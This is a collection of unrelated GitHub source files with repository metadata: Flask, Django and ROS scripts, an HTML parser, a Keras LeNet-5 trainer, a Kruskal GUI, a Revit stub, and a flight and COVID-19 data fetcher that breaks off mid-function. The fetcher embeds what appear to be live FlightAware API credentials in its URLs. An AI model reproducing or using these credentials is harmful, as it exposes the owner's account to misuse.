e7d128e1500aba2f7670ba59a46061cdec915f47 | 069d2985895eefe33454e57ff2d85b9fa8aa7fa0 | /run.py | df4f5781aa2fc97d2b52b3f42b8ed9f9d8363f45 | [] | no_license | KIRA009/formbuilder | 8a6dd2949b42560f3b7cbad4b2c00e32e09ff55f | 880fdbe211d80c31870dd8da84e376de9598b738 | refs/heads/master | 2023-02-05T16:42:08.806984 | 2019-07-02T18:34:05 | 2019-07-02T18:34:05 | 194,048,846 | 1 | 1 | null | 2023-02-02T06:32:31 | 2019-06-27T07:52:40 | JavaScript | UTF-8 | Python | false | false | 253 | py | from app_builder import build_app
import os
ROOT_DIR = os.getcwd()
app, db, migrate, login_manager = build_app(app_name=__name__, env_path=ROOT_DIR + '\.env', config_env='SETTINGS')
from myapp.views import *
if __name__ == '__main__':
app.run()
| [
"shohanduttaroy99@gmail.com"
] | shohanduttaroy99@gmail.com |
413ca2abc71b33a69400411278b07e243fbf15a8 | e4910c4b436223859d91f3569cadafa69a3c777b | /src/racecar/scripts/keyboard.py | c8c26dd85a147588db69800067b55328e93f0960 | [
"BSD-3-Clause"
] | permissive | pmusau17/F1TenthHardware | 81ae6870e15c1fe39a1f386b8bcfaa653bf2675c | 3ae3ab1cedd89e56db2fbabe24f1c6a79d3553d9 | refs/heads/master | 2023-04-01T09:02:12.635614 | 2021-04-07T16:34:17 | 2021-04-07T16:34:17 | 298,356,593 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,059 | py | #!/usr/bin/env python
import rospy
from racecar.msg import drive_param
from ackermann_msgs.msg import AckermannDriveStamped
import sys, select, termios, tty
keyBindings = {
'w':(1,0),
'd':(1,-1),
'a':(1,1),
's':(-1,0),
}
def getKey():
tty.setraw(sys.stdin.fileno())
select.select([sys.stdin], [], [], 0)
key = sys.stdin.read(1)
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, settings)
return key
speed = 0.7
turn = 0.5
if __name__=="__main__":
settings = termios.tcgetattr(sys.stdin)
rospy.init_node('keyboard', anonymous=True)
args = rospy.myargv()[1:]
if(len(args)==1):
racecar_name = args[0]
else:
racecar_name = ''
pub = rospy.Publisher(racecar_name+'/ackermann_cmd_mux/input/teleop', AckermannDriveStamped, queue_size=10)
x = 0
th = 0
status = 0
try:
while(1):
key = getKey()
if key in keyBindings.keys():
x = keyBindings[key][0]
th = keyBindings[key][1]
else:
x = 0
th = 0
if (key == '\x03'):
break
msg = drive_param()
msg.velocity = x*speed
msg.angle = th*turn
rospy.loginfo(str(msg.velocity))
rospy.loginfo(str(msg.angle))
print(x*speed,th*turn)
msg = AckermannDriveStamped();
msg.header.stamp = rospy.Time.now();
msg.header.frame_id = "base_link";
msg.drive.speed = x*speed
msg.drive.acceleration = 1
msg.drive.jerk = 1
msg.drive.steering_angle = th*turn
msg.drive.steering_angle_velocity = 1
pub.publish(msg)
except:
print 'error'
finally:
msg = drive_param()
msg.velocity = 0
msg.angle = 0
msg = AckermannDriveStamped();
msg.header.stamp = rospy.Time.now();
msg.header.frame_id = "base_link";
msg.drive.speed = x*speed
msg.drive.acceleration = 1
msg.drive.jerk = 1
msg.drive.steering_angle = th*turn
msg.drive.steering_angle_velocity = 1
pub.publish(msg)
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, settings)
| [
"pmusau13ster@gmail.com"
] | pmusau13ster@gmail.com |
616d1055e765f7c25ff5fe9c18a6da3ac5ee0136 | 9aab55d9c762b301a6cc210fa4c9a283751b9afb | /manage.py | 4e83eea1130aa492243ba92ca4e8b81726357e2c | [] | no_license | kemoeverlyne/stock | ecc4ebed1fed3b12d2ecfbc1207a570b25d31de8 | bb0a093f8072222fdc8543d73bb0443143c919a9 | refs/heads/master | 2023-04-27T22:57:58.277368 | 2021-05-22T11:51:09 | 2021-05-22T11:51:09 | 369,791,941 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 663 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
"""Run administrative tasks."""
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'stockex.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| [
"kemoeverlyne@gmail.com"
] | kemoeverlyne@gmail.com |
6e49ed65e73d2464b77c76a499689f58dccb315c | 1c283e77b584b8f23b85133d1e9333904682b133 | /travelkenya/urls.py | 8f41e23f4afaf0f06307fbdd7abda252a8a851b6 | [
"MIT"
] | permissive | Charles-Ndugire/hiking-centers | 6a9ec250ccc27106b5964f23238f3effef8a7cb6 | b2ce6c79660d65557cded334213b5cf6c20f827f | refs/heads/master | 2023-03-28T11:11:03.706417 | 2021-03-24T16:18:10 | 2021-03-24T16:18:10 | 349,413,553 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 425 | py | from django.conf.urls import url
from . import views
from django.contrib import admin
urlpatterns=[
url(r'^$',views.article_of_day,name='articleToday'),
url(r'^archives/(\d{4}-\d{2}-\d{2})/$',views.past_days_article,name = 'pastArticle'),
url(r'^article/(\d+)',views.article,name ='article'),
url(r'admin/', admin.site.urls, name='admin' ),
url(r'',(views.article_of_day), name='articleOfDay')
]
| [
"ndugirecharles@gmail.com"
] | ndugirecharles@gmail.com |
06c5cd504516c90e7f07c7a903062d100667cc1e | 600df3590cce1fe49b9a96e9ca5b5242884a2a70 | /third_party/catapult/third_party/py_vulcanize/py_vulcanize/parse_html_deps.py | 6fbe31daac48d0626acb4efdd44a3050c975ead4 | [
"LGPL-2.0-or-later",
"GPL-1.0-or-later",
"MIT",
"Apache-2.0",
"BSD-3-Clause"
] | permissive | metux/chromium-suckless | efd087ba4f4070a6caac5bfbfb0f7a4e2f3c438a | 72a05af97787001756bae2511b7985e61498c965 | refs/heads/orig | 2022-12-04T23:53:58.681218 | 2017-04-30T10:59:06 | 2017-04-30T23:35:58 | 89,884,931 | 5 | 3 | BSD-3-Clause | 2022-11-23T20:52:53 | 2017-05-01T00:09:08 | null | UTF-8 | Python | false | false | 5,738 | py | # Copyright (c) 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
import sys
from py_vulcanize import module
from py_vulcanize import strip_js_comments
from py_vulcanize import html_generation_controller
def _AddToPathIfNeeded(path):
if path not in sys.path:
sys.path.insert(0, path)
def _InitBeautifulSoup():
catapult_path = os.path.abspath(
os.path.join(os.path.dirname(__file__),
os.path.pardir, os.path.pardir, os.path.pardir))
bs_path = os.path.join(catapult_path, 'third_party', 'beautifulsoup4')
_AddToPathIfNeeded(bs_path)
html5lib_path = os.path.join(catapult_path, 'third_party', 'html5lib-python')
_AddToPathIfNeeded(html5lib_path)
six_path = os.path.join(catapult_path, 'third_party', 'six')
_AddToPathIfNeeded(six_path)
_InitBeautifulSoup()
import bs4
class InlineScript(object):
def __init__(self, soup):
if not soup:
raise module.DepsException('InlineScript created without soup')
self._soup = soup
self._stripped_contents = None
self._open_tags = None
@property
def contents(self):
return unicode(self._soup.string)
@property
def stripped_contents(self):
if not self._stripped_contents:
self._stripped_contents = strip_js_comments.StripJSComments(
self.contents)
return self._stripped_contents
@property
def open_tags(self):
if self._open_tags:
return self._open_tags
open_tags = []
cur = self._soup.parent
while cur:
if isinstance(cur, bs4.BeautifulSoup):
break
open_tags.append(_Tag(cur.name, cur.attrs))
cur = cur.parent
open_tags.reverse()
assert open_tags[-1].tag == 'script'
del open_tags[-1]
self._open_tags = open_tags
return self._open_tags
def _CreateSoupWithoutHeadOrBody(html):
soupCopy = bs4.BeautifulSoup(html, 'html5lib')
soup = bs4.BeautifulSoup()
soup.reset()
if soupCopy.head:
for n in soupCopy.head.contents:
n.extract()
soup.append(n)
if soupCopy.body:
for n in soupCopy.body.contents:
n.extract()
soup.append(n)
return soup
class HTMLModuleParserResults(object):
def __init__(self, html):
self._soup = bs4.BeautifulSoup(html, 'html5lib')
self._inline_scripts = None
@property
def scripts_external(self):
tags = self._soup.findAll('script', src=True)
return [t['src'] for t in tags]
@property
def inline_scripts(self):
if not self._inline_scripts:
tags = self._soup.findAll('script', src=None)
self._inline_scripts = [InlineScript(t.string) for t in tags]
return self._inline_scripts
@property
def imports(self):
tags = self._soup.findAll('link', rel='import')
return [t['href'] for t in tags]
@property
def stylesheets(self):
tags = self._soup.findAll('link', rel='stylesheet')
return [t['href'] for t in tags]
@property
def inline_stylesheets(self):
tags = self._soup.findAll('style')
return [unicode(t.string) for t in tags]
def YieldHTMLInPieces(self, controller, minify=False):
yield self.GenerateHTML(controller, minify)
def GenerateHTML(self, controller, minify=False, prettify=False):
soup = _CreateSoupWithoutHeadOrBody(unicode(self._soup))
# Remove declaration.
for x in soup.contents:
if isinstance(x, bs4.Doctype):
x.extract()
# Remove declaration.
for x in soup.contents:
if isinstance(x, bs4.Declaration):
x.extract()
# Remove all imports.
imports = soup.findAll('link', rel='import')
for imp in imports:
imp.extract()
# Remove all script links.
scripts_external = soup.findAll('script', src=True)
for script in scripts_external:
script.extract()
# Remove all in-line scripts.
scripts_external = soup.findAll('script', src=None)
for script in scripts_external:
script.extract()
# Process all in-line styles.
inline_styles = soup.findAll('style')
for style in inline_styles:
html = controller.GetHTMLForInlineStylesheet(unicode(style.string))
if html:
ns = soup.new_tag('style')
ns.append(bs4.NavigableString(html))
style.replaceWith(ns)
else:
style.extract()
# Rewrite all external stylesheet hrefs or remove, as needed.
stylesheet_links = soup.findAll('link', rel='stylesheet')
for stylesheet_link in stylesheet_links:
html = controller.GetHTMLForStylesheetHRef(stylesheet_link['href'])
if html:
tmp = bs4.BeautifulSoup(html, 'html5lib').findAll('style')
assert len(tmp) == 1
stylesheet_link.replaceWith(tmp[0])
else:
stylesheet_link.extract()
# Remove comments if minifying.
if minify:
comments = soup.findAll(
text=lambda text: isinstance(text, bs4.Comment))
for comment in comments:
comment.extract()
if prettify:
return soup.prettify('utf-8').strip()
# We are done.
return unicode(soup).strip()
@property
def html_contents_without_links_and_script(self):
return self.GenerateHTML(
html_generation_controller.HTMLGenerationController())
class _Tag(object):
def __init__(self, tag, attrs):
self.tag = tag
self.attrs = attrs
def __repr__(self):
attr_string = ' '.join('%s="%s"' % (x[0], x[1]) for x in self.attrs)
return '<%s %s>' % (self.tag, attr_string)
class HTMLModuleParser():
def Parse(self, html):
if html is None:
html = ''
else:
if html.find('< /script>') != -1:
raise Exception('Escape script tags with <\/script>')
return HTMLModuleParserResults(html)
| [
"enrico.weigelt@gr13.net"
] | enrico.weigelt@gr13.net |
167e81e8614a1402305e6e1d74d76c804b0bcf19 | 74ba6afdb6c5173ba6fe3a1aa9402aa3b7801dea | /manage.py | 55b1c640342e6091340fa31424f9af2081c7490d | [] | no_license | YuTaoFighting/QNUOJ | 6c0ced86eb8b41f05d59d99c4d68e68f914397ca | 7740c49b5add3b81bcd681e46fcbefd04a5c4e15 | refs/heads/master | 2020-10-01T19:03:30.450055 | 2019-12-21T15:28:04 | 2019-12-21T15:28:04 | 227,604,716 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 803 | py | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "QNUOJ.settings")
try:
from django.core.management import execute_from_command_line
except ImportError:
# The above import may fail for some other reason. Ensure that the
# issue is really that Django is missing to avoid masking other
# exceptions on Python 2.
try:
import django
except ImportError:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
raise
execute_from_command_line(sys.argv)
| [
"13012529035@163.com"
] | 13012529035@163.com |
0154d7e296c022db6601b785bfdd0ae791710f99 | 02f75a4cf04392e15cf32cb84d9fd55834955fb6 | /2_assign/5_step.py | d6075b5ea153ab5cfe8302f543169b5f3c507f66 | [] | no_license | Essler/deeplearn | 6d2095d123d14ea6e45b1e194556d98632e58b6d | c8391390bd7dc627cf322c7a2cec6218ed56dcf2 | refs/heads/main | 2023-04-22T05:07:27.010753 | 2021-04-21T05:14:02 | 2021-04-21T05:14:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,037 | py | from keras.datasets import mnist
from keras.utils import np_utils, plot_model
from matplotlib import pyplot
from tensorflow.python.keras.models import Model
(train_images, train_labels), (test_images, test_labels) = mnist.load_data()
# 10 classes (numbers 0-9)
nb_classes = 10
# 28x28px single-channel (grayscale) images
img_rows, img_cols = 28, 28
train_labels = np_utils.to_categorical(train_labels, nb_classes)
test_labels = np_utils.to_categorical(test_labels, nb_classes)
train_images = train_images.reshape(train_images.shape[0], img_rows, img_cols, 1)
test_images = test_images.reshape(test_images.shape[0], img_rows, img_cols, 1)
input_shape = (img_rows, img_cols, 1)
# Change data type to 32-bit floats and normalize colors by dividing by 255 (the largest 8-bit color value)
train_images = train_images.astype('float32') / 255.0
test_images = test_images.astype('float32') / 255.0
print('train_images shape: ', train_images.shape)
print(train_images.shape[0], ' train samples')
print(test_images.shape[0], ' test samples')
batch_size = 128
epochs = 10
from keras.layers import Input, Convolution2D, AveragePooling2D, Flatten, Dense
inputs = Input(shape=(28,28,1))
print(inputs.shape)
print(inputs.dtype)
# C1
x = Convolution2D(6, kernel_size=(5,5), strides=(1,1), activation='tanh', input_shape=(28,28,1), padding='same')(inputs)
# S2
x = AveragePooling2D(pool_size=(2,2), strides=(2,2), padding='valid')(x)
# C3
x = Convolution2D(16, kernel_size=(5,5), strides=(1,1), activation='tanh', padding='valid')(x)
# S4
x = AveragePooling2D(pool_size=(2,2), strides=(2,2), padding='valid')(x)
# C5
x = Convolution2D(120, kernel_size=(5,5), strides=(1,1), activation='tanh', padding='valid')(x)
# Flatten
x = Flatten()(x)
# FC6
x = Dense(84, activation='tanh')(x)
# Output
outputs = Dense(10, activation='softmax')(x)
model = Model(inputs=inputs, outputs=outputs, name='mnist_lenet-5')
# Default all layers as not trainable
for layer in model.layers:
layer.trainable = False
# Then choose one, and only one, to train
# model.layers[0].trainable = True
# model.layers[1].trainable = True
# model.layers[2].trainable = True
# model.layers[3].trainable = True
# model.layers[4].trainable = True
model.layers[5].trainable = True
# model.layers[6].trainable = True
model.compile(loss='categorical_crossentropy', optimizer='SGD', metrics=['accuracy'])
history = model.fit(x=train_images, y=train_labels, batch_size=batch_size, epochs=epochs, verbose=1,
validation_data=(test_images, test_labels))
# Test model
score = model.evaluate(test_images, test_labels, verbose=0)
print('Test loss: {:.4f}, Test accuracy {:.2f}%'.format(score[0], score[1]*100))
train_acc = history.history['accuracy']
test_acc = history.history['val_accuracy']
pyplot.suptitle('LeNet-5 1-Layer Train')
pyplot.xlabel('Epoch')
pyplot.ylabel('Accuracy')
pyplot.xlim(1, epochs)
pyplot.plot(range(1, epochs+1), train_acc, 'r', label='Train')
pyplot.plot(range(1, epochs+1), test_acc, 'b', label='Test')
pyplot.legend()
pyplot.show()
| [
"Essler@users.noreply.github.com"
] | Essler@users.noreply.github.com |
f059eb687fca6ba374b05c14031bab341c8a0b52 | 6234ebee2721a1cd16531af37427d74a6efe5ed4 | /src/com/fans/stat/restful/v1/common.py | ebdc846f40cbe482a1c27324047bae548554a15d | [] | no_license | patronfeng/fans-data | 523a956b3a584b74a1e9803113fdf892db520f48 | 9ea7c2d94910d62e988973b03d6ce1385f8b10c4 | refs/heads/master | 2016-09-06T00:28:24.003468 | 2015-05-28T09:56:33 | 2015-05-28T09:56:33 | 36,434,237 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 202 | py | __author__ = 'ZENGFANGUI'
from src.com.fans.common.redis.RedisConnection import RedisCache
import pyes
from config import *
es_connection=pyes.ES(es_host)
redispool = RedisCache(redis_host,redis_port) | [
"ZENGFANGUI@MacBook-Air.local"
] | ZENGFANGUI@MacBook-Air.local |
a02bdc037ebc369befd1f7b1b78a5e1958fd16c5 | d2d2d4b7294c0ae08c0ca31e7a7030103c0cd73d | /setup.py | fc4f612019e561cb4c7b7f8ade6ee64f9d8cbea8 | [
"MIT"
] | permissive | mydatakeeper/python-distutilscross | b38f5d65241ece1ca5aab3471da08e049909ea7e | bd5052ca76d4e2cf226c9cd2d91408ec003e7c0c | refs/heads/master | 2020-05-19T20:01:09.555633 | 2019-05-06T12:40:02 | 2019-05-06T12:40:02 | 185,193,368 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,461 | py | from setuptools import setup, find_packages
long_description = """\
Really it lets you cross build binary extensions.
You need to export PYTHONXCPREFIX and LDFLAGS, something like::
$ export PYTHONXCPREFIX=/opt/eldk/ppc_4xxFP/usr
$ export LDFLAGS="-L/opt/eldk/ppc_4xxFP/lib -L/opt/eldk/ppc_4xxFP/usr/lib"
Some build environments also need you to specify the CC and LDSHARED
environment variables::
$ export CC="ppc_4xxFP-gcc -pthread"
$ export LDSHARED="$CC -shared"
It should pick up the correct include paths from the PYTHONXCPREFIX. To build
use::
$ python setup.py build -x
To make a cross compiled egg::
$ python setup.py build -x bdist_egg --plat-name linux-ppc --exclude-source-files
"""
setup(
name = "distutilscross",
version = "0.2",
description="Cross Compile Python Extensions",
long_description=long_description,
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Topic :: Software Development :: Build Tools',
],
keywords="distutils setuptools egg compile cross-compile",
author="Chris Lambacher",
author_email="chris@kateandchris.net",
url="http://bitbucket.org/lambacck/distutilscross/",
license='MIT',
packages = find_packages(),
entry_points = {
"distutils.commands": [
"build=distutilscross.crosscompile:build",
],
},
)
| [
"chris@kateandchris.net"
] | chris@kateandchris.net |
2f963f67f5c10bc648266f281cbcbbefbe1b06b3 | e3af70c6b4fe16f2be4bf141dc95c3b1d9af8afa | /Assignment1inPython/kruskal.py | ee84a4619e05fdc03df6f38dd232f5f86f260a92 | [] | no_license | DeleMax/Assignment1inPython | ae9543f9ef11e9f674a9d7f3ce21e5ce4432d9b0 | 7a708feff51deb3976d1e535fb89dd721b7e6c29 | refs/heads/master | 2020-12-02T04:20:25.258047 | 2016-09-01T18:10:35 | 2016-09-01T18:10:35 | 67,154,643 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,991 | py | import time
from tkinter import*
parent = dict()
rank = dict()
def make_set(vertice):
parent[vertice] = vertice
rank[vertice] = 0
def find(vertice):
if parent[vertice] != vertice:
parent[vertice] = find(parent[vertice])
return parent[vertice]
def union(vertice1, vertice2):
root1 = find(vertice1)
root2 = find(vertice2)
if root1 != root2:
if rank[root1] > rank[root2]:
parent[root2] = root1
else:
parent[root1] = root2
if rank[root1] == rank[root2]: rank[root2] += 1
def kruskal(graph):
for vertice in graph['vertices']:
make_set(vertice)
minimum_spanning_tree = set()
edges = list(graph['edges'])
edges.sort()
for edge in edges:
weight, vertice1, vertice2 = edge
if find(vertice1) != find(vertice2):
union(vertice1, vertice2)
minimum_spanning_tree.add(edge)
return minimum_spanning_tree
def do():
filename = entry_1.get()
start = time.time()
f = open(filename, 'r')
content = list(f)
graph = {'vertices': [], 'edges': []}
graph['vertices'] = range(0, len(content))
edges = set()
for i in range(len(content)):
str_arr = content[i].split()
for j in range(len(str_arr)):
edges.add((int(str_arr[j]),i,j))
graph['edges'] = edges
minimum_spanning_tree = kruskal(graph)
p = open("resultPython.txt", 'w+')
v= open("resultPython2.txt", 'w+')
result = '\n'.join([ str(myelement) for myelement in minimum_spanning_tree ])
p.write(result)
v.write("The total number of edges in the minimum spanning tree is: " + str(len(minimum_spanning_tree))+'\n')
v.write("The number of nodes is: " + str(len(content))+'\n')
v.write("The total cost of the spanning tree is: " + str(sum([x[0] for x in minimum_spanning_tree]))+'\n')
end = (time.time() - start)
v.write("Total Execution time = "+str(end)+" seconds")
v.close()
p.close()
f = open('resultPython2.txt','r')
conttent = set(f)
sprintt = '\n'.join([ str(myelement) for myelement in conttent ])
label_2.config(text=sprintt)
f.close()
def loadme():
f = open('resultPython.txt','r')
content = set(f)
sprint = '\n'.join([ str(myelement) for myelement in content ])
label_2.config(text=sprint)
f.close()
root = Tk()
label_l = Label(root, text = "File Name")
entry_1 = Entry(root)
label_2 = Label(root, text = '')
label_l.grid(row=0)
entry_1.grid(row=0, column=1)
label_2.grid(columnspan = 10)
c_1 = Checkbutton(root, text= "Use Kruskal's Algorithm")
c_2 = Checkbutton(root, text= "Use Prim's Algorithm")
c_1.select()
c_1.grid(columnspan=2)
c_2.grid(columnspan=2)
button_1 = Button(root, text = "Compute", command= do)
button_2 = Button(root, text = "Step", command = loadme)
button_1.grid(columnspan = 3)
button_2.grid(columnspan = 4)
root.mainloop()
| [
"bamideleajayi02@gmail.com"
] | bamideleajayi02@gmail.com |
1132547772e06d6b2ee93fee62cd3605b759ec0c | 60a831fb3c92a9d2a2b52ff7f5a0f665d4692a24 | /IronPythonStubs/release/stubs.min/Autodesk/Revit/DB/__init___parts/BindingMap.py | 686d18be3c7071d131cd785f06980c6c9a4a0c07 | [
"MIT"
] | permissive | shnlmn/Rhino-Grasshopper-Scripts | a9411098c5d1bbc55feb782def565d535b27b709 | 0e43c3c1d09fb12cdbd86a3c4e2ba49982e0f823 | refs/heads/master | 2020-04-10T18:59:43.518140 | 2020-04-08T02:49:07 | 2020-04-08T02:49:07 | 161,219,695 | 11 | 2 | null | null | null | null | UTF-8 | Python | false | false | 4,051 | py | class BindingMap(DefinitionBindingMap,IDisposable,IEnumerable):
"""
The parameters BindingMap contains all the parameter bindings that exist in the
Autodesk Revit project.
"""
def Clear(self):
"""
Clear(self: BindingMap)
This method is used to remove all the items in the map.
"""
pass
def Contains(self,key):
"""
Contains(self: BindingMap,key: Definition) -> bool
The Contains method is used to check if the parameter binding exists for one
definition.
key: A parameter definition which can be an existing definition or one from a shared
parameters file.
"""
pass
def Dispose(self):
""" Dispose(self: BindingMap,A_0: bool) """
pass
def Erase(self,key):
"""
Erase(self: BindingMap,key: Definition) -> int
This method is used to erase one item in the map.
"""
pass
def Insert(self,key,item,parameterGroup=None):
"""
Insert(self: BindingMap,key: Definition,item: Binding) -> bool
Creates a new parameter binding between a parameter and a set of categories.
key: A parameter definition which can be an existing definition or one from a shared
parameters file.
item: An InstanceBinding or TypeBinding object which contains the set of categories
to which the parameter should be bound.
Insert(self: BindingMap,key: Definition,item: Binding,parameterGroup: BuiltInParameterGroup) -> bool
Creates a new parameter binding between a parameter and a set of categories in
a specified group.
key: A parameter definition which can be an existing definition or one from a shared
parameters file.
item: An InstanceBinding or TypeBinding object which contains the set of categories
to which the parameter should be bound.
parameterGroup: The GroupID of the parameter definition.
"""
pass
def ReInsert(self,key,item,parameterGroup=None):
"""
ReInsert(self: BindingMap,key: Definition,item: Binding) -> bool
Removes an existing parameter and creates a new binding for a given parameter.
key: A parameter definition which can be an existing definition or one from a shared
parameters file.
item: An InstanceBinding or TypeBinding object which contains the set of categories
to which the parameter should be bound.
ReInsert(self: BindingMap,key: Definition,item: Binding,parameterGroup: BuiltInParameterGroup) -> bool
Removes an existing parameter and creates a new binding for a given parameter
in a specified group.
key: A parameter definition which can be an existing definition or one from a shared
parameters file.
item: An InstanceBinding or TypeBinding object which contains the set of categories
to which the parameter should be bound.
parameterGroup: The GroupID of the parameter definition.
"""
pass
def ReleaseManagedResources(self,*args):
""" ReleaseManagedResources(self: APIObject) """
pass
def ReleaseUnmanagedResources(self,*args):
""" ReleaseUnmanagedResources(self: APIObject) """
pass
def Remove(self,key):
"""
Remove(self: BindingMap,key: Definition) -> bool
The Remove method is used to remove a parameter binding.
key: A parameter definition which can be an existing definition or one from a shared
parameters file.
"""
pass
def __enter__(self,*args):
""" __enter__(self: IDisposable) -> object """
pass
def __exit__(self,*args):
""" __exit__(self: IDisposable,exc_type: object,exc_value: object,exc_back: object) """
pass
def __getitem__(self,*args):
""" x.__getitem__(y) <==> x[y] """
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __iter__(self,*args):
""" __iter__(self: IEnumerable) -> object """
pass
def __setitem__(self,*args):
""" x.__setitem__(i,y) <==> x[i]= """
pass
| [
"magnetscoil@gmail.com"
] | magnetscoil@gmail.com |
0c1ad9cb091f48da49c58549e01d5080ad33b491 | b82034236fe9988e7ba420a1b2fc56f4e185f726 | /FetchFlights.py | eb6c0f3158d13888d52969696dc9139c9b802b67 | [] | no_license | aguglani-umich/Final-Project-206 | fa7132e36fb53d66251d729be375029e6dbcee24 | e305974ff3a06085bc08ef09dff818ae0e71df57 | refs/heads/master | 2023-04-11T03:09:11.705470 | 2021-04-26T17:54:05 | 2021-04-26T17:54:05 | 320,954,467 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,479 | py | import json
import unittest
import os
import requests
import sqlite3
import re
# FetchFlights.py
# This peice of code calls two API's to gather data and store it in thee different tables: flights, locals, and COVID under the Data.db database
# The purpose of this peice of code is to fetch the arrivals for the day from the Detroit Airport (400 Arrivals Daily), find where they came from, and then get data about coronavirus positivity from those origins
''' FUNCTIONS '''
# PURPOSE: Figure out if the data.db database has any tables in it and if so how much data is in
# those tables to know how many flights from the arrivals board to offset
# INPUT: The cursor to the open database
# OUTPUT: Record Quantity
def databaseValidation(cur):
try:
counta = 0
cur.execute("SELECT * FROM Flights")
for flight in cur:
counta += 1
return counta
# We need to create tables from scratch if so
except:
return 0
# PURPOSE: Get connected to database
# INPUT: The database name
# OUTPUT: A cursor and connection
def setUpDatabase(db_name):
path = os.path.dirname(os.path.abspath(__file__))
conn = sqlite3.connect(path+'/'+db_name)
cur = conn.cursor()
return cur, conn
# PURPOSE: Retrive additional context for the origin airport of any given flight
# INPUT: The airport code of any given airport
# OUTPUT: A database ready tuple of the airport code, airport longitude, airport latitude,
# airport state, and airport country to be used for visulizations and to get COVID-19 data
def getAirportData(code):
print("Getting Airport Info from FlightAware about " + code)
data = requests.get("http://traveltimeiosapp:b34cb08f23579a0812280da25b76aee4e47bac16@flightxml.flightaware.com/json/FlightXML3/AirportInfo?airport_code=" + code)
try:
jsonData = json.loads(data.text)["AirportInfoResult"]
return (str(jsonData.get("airport_code", code)), float(jsonData.get("longitude", 0.0)), float(jsonData.get("latitude", 0.0)), str(jsonData.get("state", "--")), str(jsonData.get("city", "--")), str(jsonData.get("country_code", "--")))
except:
print("Uh-Oh... we are having some trouble connecting to FlightAware")
return (code, 0.0, 0.0, "--", "--", "--")
# PURPOSE: Get 25 Arrivals from FlightAware Airport Arrivals Boards API
# INPUT: This function takes in how many recent arrivals to offset from the most recent touchdown
# (this is rapidly changing with every landing)
# OUTPUT: returns the arrivals board for the DTW airport 25 flights at a time
def flightBoardDTW(offset):
print("Getting 25 Flights from FlightAware Arrivals Board API")
data = requests.get("http://traveltimeiosapp:b34cb08f23579a0812280da25b76aee4e47bac16@flightxml.flightaware.com/json/FlightXML3/AirportBoards?howMany=25&offset=" + str(offset) + "&airport_code=KDTW&include_ex_data=true&type=arrivals&filter=airline")
try:
return json.loads(data.text)["AirportBoardsResult"]["arrivals"]["flights"]
except:
print("Uh-Oh... we are having some trouble connecting to FlightAware")
return None
# PURPOSE: Get coronavirus statistics for a particular state
# INPUT: a particular state
# OUTPUT: basic coronavirus quantities from yesterday or last Friday if weekend
def getCoronaData(state):
print("Getting COVID data for " + state)
data = requests.get("https://localcoviddata.com/covid19/v1/cases/covidTracking?state=" + state + "&daysInPast=1")
try:
dataPack = json.loads(data.text)["historicData"][0]
return (state, int(dataPack.get("peoplePositiveNewCasesCt", 0)), int(dataPack.get("peopleNegativeNewCt", 0)), int(dataPack.get("peopleDeathCt", 0)))
except:
print("Uh-Oh... we are having some trouble connecting to Muelsoft COVID-19 Data")
return (state, 0, 0, 0)
# Runner of program that gets flights, loops through them, and calls remaining functions to complete file's mission
def main():
manifest = [] # list of airports in db
cur, conn = setUpDatabase("data.db")
validateDatabaseCount = databaseValidation(cur)
print("Starting at " + str(validateDatabaseCount) + "ith position in Database\n")
if(validateDatabaseCount == 0):
cur.execute("CREATE TABLE IF NOT EXISTS Flights (flightNumber TEXT PRIMARY KEY, origin TEXT, PAXCount INTEGER)")
cur.execute("CREATE TABLE IF NOT EXISTS Locals (code TEXT PRIMARY KEY, lng DOUBLE, lat DOUBLE, state TEXT, cityName TEXT, countryCode TEXT)")
cur.execute("CREATE TABLE IF NOT EXISTS Corona (state TEXT PRIMARY KEY, peoplePositiveNewCasesCt INTEGER, peopleNegativeNewCt INTEGER, peopleDeathCt INTEGER)")
else:
#Find which airports we already have in DB
cur.execute("SELECT code FROM Locals")
for code in cur.fetchall():
manifest.append(code[0])
grabFlights = flightBoardDTW(validateDatabaseCount+2)
for flight in grabFlights:
# Convience Print to Acknoledge Processing of the Flight
print("\nProcessing: " + flight["ident"])
# Inject flight into database accounting for any arrivals that may land while this is being run and push the departures list back
cur.execute("INSERT OR IGNORE INTO Flights (flightNumber, origin, PAXCount) VALUES (?, ?, ?) ", (str(flight["ident"]), str(flight["origin"]["code"]), (int(flight.get("seats_cabin_business", "0")) + int(flight.get("seats_cabin_coach", "0")))))
#if airport code is novel, call api for more data and then
if (str(flight["origin"]["code"]) not in manifest):
#Get & Store Data about the Airport from the flight
airportData = getAirportData(str(flight["origin"]["code"]))
cur.execute("INSERT OR IGNORE INTO Locals (code, lng, lat, state, cityName, countryCode) VALUES (?, ?, ?, ?, ?, ?) ", airportData)
#Get Corona Data for all US States that the flight originiated from. International Origins are not supported by the API and are injected into database
if(airportData[5] == "US"):
